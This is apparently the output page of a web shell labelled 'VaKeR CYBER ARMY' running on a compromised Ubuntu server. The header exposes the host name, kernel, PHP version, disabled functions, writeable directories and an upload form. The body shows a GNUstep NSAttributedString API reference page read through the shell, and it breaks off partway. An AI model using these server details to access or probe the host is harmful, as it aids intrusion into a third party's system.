VaKeR CYBER ARMY
Logo of a company Server : Apache/2.4.41 (Ubuntu)
System : Linux absol.cf 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /proc/self/root/usr/share/GNUstep/Documentation/Developer/Gui/Reference/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/usr/share/GNUstep/Documentation/Developer/Gui/Reference/NSAttributedString.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

    <head>
    <title>NSAttributedStringAdditions</title>
  </head>
  <body>
    <font face="serif">
    <a href="Gui.html">Up</a>
    <br />
    <h1><a name="title$NSAttributedString">NSAttributedStringAdditions</a></h1>
    <h3>Authors</h3>
    <dl>
      <dt>Richard Frith-Macdonald (<a href="mailto:richard@brainstorm.co.uk"><code>richard@brainstorm.co.uk</code></a>)</dt>
      <dd>
      </dd>
    </dl>
    <blockquote>
      
      Categories which add capabilities to
      NSAttributedString
    
    </blockquote>
    <p><b>Copyright:</b> (C) 1999 Free Software Foundation, Inc.</p>

        <div>
      <hr width="50%" align="left" />
      <h3>Contents -</h3>
      <ol>
        <li>
          <a href="#001000000000">Software documentation for the
        NSAttributedString(AppKit) category</a>
        </li>
        <li>
          <a href="#002000000000">Software documentation for the
        NSMutableAttributedString(AppKit)
        category</a>
        </li>
      </ol>
      <hr width="50%" align="left" />
    </div>

          <h1><a name="001000000000">
        Software documentation for the
        NSAttributedString(AppKit) category
      </a></h1>
    <h2><a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSAttributedString.html#class$NSAttributedString">NSAttributedString</a>(<a name="category$NSAttributedString(AppKit)">AppKit</a>)</h2>
    <blockquote class="declared">
      <dl>
        <dt><b>Declared in:</b></dt>
        <dd>AppKit/NSAttributedString.h</dd>
      </dl>
    </blockquote>
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
          <em>Description forthcoming.</em>
        
    </div>
    <b>Method summary</b>
    <ul>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textFileTypes">+textFileTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textPasteboardTypes">+textPasteboardTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textTypes">+textTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textUnfilteredFileTypes">+textUnfilteredFileTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textUnfilteredPasteboardTypes">+textUnfilteredPasteboardTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)+textUnfilteredTypes">+textUnfilteredTypes</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-RTFDFileWrapperFromRange$documentAttributes$">-RTFDFileWrapperFromRange:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-RTFDFromRange$documentAttributes$">-RTFDFromRange:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-RTFFromRange$documentAttributes$">-RTFFromRange:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-containsAttachments">-containsAttachments</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-dataFromRange$documentAttributes$error$">-dataFromRange:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-docFormatFromRange$documentAttributes$">-docFormatFromRange:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-doubleClickAtIndex$">-doubleClickAtIndex:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-fileWrapperFromRange$documentAttributes$error$">-fileWrapperFromRange:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-fontAttributesInRange$">-fontAttributesInRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithData$options$documentAttributes$error$">-initWithData:options:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithDocFormat$documentAttributes$">-initWithDocFormat:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithHTML$baseURL$documentAttributes$">-initWithHTML:baseURL:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithHTML$documentAttributes$">-initWithHTML:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithHTML$options$documentAttributes$">-initWithHTML:options:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithPath$documentAttributes$">-initWithPath:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithRTF$documentAttributes$">-initWithRTF:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithRTFD$documentAttributes$">-initWithRTFD:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithRTFDFileWrapper$documentAttributes$">-initWithRTFDFileWrapper:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithURL$documentAttributes$">-initWithURL:documentAttributes:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-initWithURL$options$documentAttributes$error$">-initWithURL:options:documentAttributes:error:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-itemNumberInTextList$atIndex$">-itemNumberInTextList:atIndex:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-lineBreakBeforeIndex$withinRange$">-lineBreakBeforeIndex:withinRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-lineBreakByHyphenatingBeforeIndex$withinRange$">-lineBreakByHyphenatingBeforeIndex:withinRange:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-nextWordFromIndex$forward$">-nextWordFromIndex:forward:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-rangeOfTextBlock$atIndex$">-rangeOfTextBlock:atIndex:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-rangeOfTextList$atIndex$">-rangeOfTextList:atIndex:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-rangeOfTextTable$atIndex$">-rangeOfTextTable:atIndex:</a></li>
      <li><a rel="gsdoc" href="NSAttributedString.html#method$NSAttributedString(AppKit)-rulerAttributesInRange$">-rulerAttributesInRange:</a></li>
    </ul>
    <hr width="50%" align="left" />
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textFileTypes">textFileTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textFileTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textPasteboardTypes">textPasteboardTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textPasteboardTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textTypes">textTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.5.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textUnfilteredFileTypes">textUnfilteredFileTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textUnfilteredFileTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textUnfilteredPasteboardTypes">textUnfilteredPasteboardTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textUnfilteredPasteboardTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)+textUnfilteredTypes">textUnfilteredTypes&nbsp;</a></h3>
    + (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSArray.html#class$NSArray">NSArray</a>*) <b>textUnfilteredTypes</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.5.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-RTFDFileWrapperFromRange$documentAttributes$">RTFDFileWrapperFromRange:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="NSFileWrapper.html#class$NSFileWrapper">NSFileWrapper</a>*) <b>RTFDFileWrapperFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-RTFDFromRange$documentAttributes$">RTFDFromRange:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*) <b>RTFDFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-RTFFromRange$documentAttributes$">RTFFromRange:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*) <b>RTFFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-containsAttachments">containsAttachments&nbsp;</a></h3>
    - (BOOL) <b>containsAttachments</b>;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-dataFromRange$documentAttributes$error$">dataFromRange:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*) <b>dataFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-docFormatFromRange$documentAttributes$">docFormatFromRange:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*) <b>docFormatFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.3.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-doubleClickAtIndex$">doubleClickAtIndex:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>) <b>doubleClickAtIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-fileWrapperFromRange$documentAttributes$error$">fileWrapperFromRange:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="NSFileWrapper.html#class$NSFileWrapper">NSFileWrapper</a>*) <b>fileWrapperFromRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)dict<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-fontAttributesInRange$">fontAttributesInRange:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*) <b>fontAttributesInRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)range;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithData$options$documentAttributes$error$">initWithData:&nbsp;options:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (id) <b>initWithData:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithDocFormat$documentAttributes$">initWithDocFormat:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithDocFormat:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.3.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithHTML$baseURL$documentAttributes$">initWithHTML:&nbsp;baseURL:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithHTML:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> baseURL:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSURL.html#class$NSURL">NSURL</a>*)base<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithHTML$documentAttributes$">initWithHTML:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithHTML:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithHTML$options$documentAttributes$">initWithHTML:&nbsp;options:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithHTML:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.3.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithPath$documentAttributes$">initWithPath:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithPath:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSString.html#class$NSString">NSString</a>*)path<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithRTF$documentAttributes$">initWithRTF:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithRTF:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithRTFD$documentAttributes$">initWithRTFD:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithRTFD:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSData.html#class$NSData">NSData</a>*)data<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithRTFDFileWrapper$documentAttributes$">initWithRTFDFileWrapper:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithRTFDFileWrapper:</b> (<a rel="gsdoc" href="NSFileWrapper.html#class$NSFileWrapper">NSFileWrapper</a>*)wrapper<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithURL$documentAttributes$">initWithURL:&nbsp;documentAttributes:&nbsp;</a></h3>
    - (id) <b>initWithURL:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSURL.html#class$NSURL">NSURL</a>*)url<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-initWithURL$options$documentAttributes$error$">initWithURL:&nbsp;options:&nbsp;documentAttributes:&nbsp;error:&nbsp;</a></h3>
    - (id) <b>initWithURL:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSURL.html#class$NSURL">NSURL</a>*)url<b> options:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>*)options<b> documentAttributes:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSDictionary.html#class$NSDictionary">NSDictionary</a>**)dict<b> error:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/NSError.html#class$NSError">NSError</a>**)error;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-itemNumberInTextList$atIndex$">itemNumberInTextList:&nbsp;atIndex:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSInteger">NSInteger</a>) <b>itemNumberInTextList:</b> (NSTextList*)list<b> atIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.4.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-lineBreakBeforeIndex$withinRange$">lineBreakBeforeIndex:&nbsp;withinRange:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>) <b>lineBreakBeforeIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location<b> withinRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)aRange;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-lineBreakByHyphenatingBeforeIndex$withinRange$">lineBreakByHyphenatingBeforeIndex:&nbsp;withinRange:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>) <b>lineBreakByHyphenatingBeforeIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location<b> withinRange:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/Base/Reference/TypesAndConstants.html#type$NSRange">NSRange</a>)aRange;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.3.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
    <h3><a name="method$NSAttributedString(AppKit)-nextWordFromIndex$forward$">nextWordFromIndex:&nbsp;forward:&nbsp;</a></h3>
    - (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>) <b>nextWordFromIndex:</b> (<a rel="gsdoc" href="/usr/share/GNUstep/Documentation/Developer/BaseAdditions/Reference/TypesAndConstants.html#type$NSUInteger">NSUInteger</a>)location<b> forward:</b> (BOOL)isForward;<br />
    <div class="availability">
<b>Availability:</b> MacOS-X 10.0.0</div>
<br />
    <div class="desc">
      
            <em>Description forthcoming.</em>
          
    </div>
    <hr width="25%" align="left" />
</div>
<div class="method">
